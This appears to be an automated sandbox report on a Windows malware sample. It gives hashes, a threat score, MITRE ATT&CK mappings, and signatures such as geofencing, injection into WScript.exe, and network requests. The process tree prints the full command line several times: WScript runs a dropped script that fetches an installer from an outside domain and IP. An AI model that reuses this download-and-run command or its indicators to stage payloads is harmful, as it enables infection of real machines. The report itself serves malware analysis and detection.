abace5bb86b6d3221e84affa385556a06f70a0b92f057f7ef33b973206daa4c5

General

Target

abace5bb86b6d3221e84affa385556a06f70a0b92f057f7ef33b973206daa4c5.exe
Size

184KB
MD5

896ca0eb2a4cfe197cb6a045bf1f9677
SHA1

64820381b3b5c7c66e9a435e2abc50e4a78f097d
SHA256

abace5bb86b6d3221e84affa385556a06f70a0b92f057f7ef33b973206daa4c5
SHA512

b2c75783a0dc3cfd19517dde76eae607f172d640e1400626878edef2ff5dd902464952479291baf1501c52de31f93e69e82a47c6f247c99b57d761d06c524da6
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3/8:/7BSH8zUB+nGESaaRvoB7FJNndnt

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 13 IoCs

flow	pid	Process
14	620	WScript.exe
31	620	WScript.exe
41	2316	WScript.exe
42	2316	WScript.exe
43	4132	WScript.exe
52	4132	WScript.exe
53	4572	WScript.exe
54	4572	WScript.exe
59	4572	WScript.exe
64	4572	WScript.exe
66	4572	WScript.exe
68	4188	WScript.exe
69	4188	WScript.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	abace5bb86b6d3221e84affa385556a06f70a0b92f057f7ef33b973206daa4c5.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings	abace5bb86b6d3221e84affa385556a06f70a0b92f057f7ef33b973206daa4c5.exe

Script User-Agent 3 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	41	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	53	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	68	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 3968 wrote to memory of 620	3968	abace5bb86b6d3221e84affa385556a06f70a0b92f057f7ef33b973206daa4c5.exe	80
PID 3968 wrote to memory of 620	3968	abace5bb86b6d3221e84affa385556a06f70a0b92f057f7ef33b973206daa4c5.exe	80
PID 3968 wrote to memory of 620	3968	abace5bb86b6d3221e84affa385556a06f70a0b92f057f7ef33b973206daa4c5.exe	80
PID 3968 wrote to memory of 2316	3968	abace5bb86b6d3221e84affa385556a06f70a0b92f057f7ef33b973206daa4c5.exe	82
PID 3968 wrote to memory of 2316	3968	abace5bb86b6d3221e84affa385556a06f70a0b92f057f7ef33b973206daa4c5.exe	82
PID 3968 wrote to memory of 2316	3968	abace5bb86b6d3221e84affa385556a06f70a0b92f057f7ef33b973206daa4c5.exe	82
PID 3968 wrote to memory of 4132	3968	abace5bb86b6d3221e84affa385556a06f70a0b92f057f7ef33b973206daa4c5.exe	83
PID 3968 wrote to memory of 4132	3968	abace5bb86b6d3221e84affa385556a06f70a0b92f057f7ef33b973206daa4c5.exe	83
PID 3968 wrote to memory of 4132	3968	abace5bb86b6d3221e84affa385556a06f70a0b92f057f7ef33b973206daa4c5.exe	83
PID 3968 wrote to memory of 4572	3968	abace5bb86b6d3221e84affa385556a06f70a0b92f057f7ef33b973206daa4c5.exe	89
PID 3968 wrote to memory of 4572	3968	abace5bb86b6d3221e84affa385556a06f70a0b92f057f7ef33b973206daa4c5.exe	89
PID 3968 wrote to memory of 4572	3968	abace5bb86b6d3221e84affa385556a06f70a0b92f057f7ef33b973206daa4c5.exe	89
PID 3968 wrote to memory of 4188	3968	abace5bb86b6d3221e84affa385556a06f70a0b92f057f7ef33b973206daa4c5.exe	91
PID 3968 wrote to memory of 4188	3968	abace5bb86b6d3221e84affa385556a06f70a0b92f057f7ef33b973206daa4c5.exe	91
PID 3968 wrote to memory of 4188	3968	abace5bb86b6d3221e84affa385556a06f70a0b92f057f7ef33b973206daa4c5.exe	91

C:\Users\Admin\AppData\Local\Temp\abace5bb86b6d3221e84affa385556a06f70a0b92f057f7ef33b973206daa4c5.exe
"C:\Users\Admin\AppData\Local\Temp\abace5bb86b6d3221e84affa385556a06f70a0b92f057f7ef33b973206daa4c5.exe"
1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3968
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufCA79.js" http://www.djapp.info/?domain=zQAjxREogx.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufCA79.exe
  2⤵
  - Blocklisted process makes network request
  PID:620
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufCA79.js" http://www.djapp.info/?domain=zQAjxREogx.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufCA79.exe
  2⤵
  - Blocklisted process makes network request
  PID:2316
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufCA79.js" http://www.djapp.info/?domain=zQAjxREogx.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufCA79.exe
  2⤵
  - Blocklisted process makes network request
  PID:4132
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufCA79.js" http://www.djapp.info/?domain=zQAjxREogx.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufCA79.exe
  2⤵
  - Blocklisted process makes network request
  PID:4572
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufCA79.js" http://www.djapp.info/?domain=zQAjxREogx.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufCA79.exe
  2⤵
  - Blocklisted process makes network request
  PID:4188

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\fufCA79.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit

Analysis

Sharing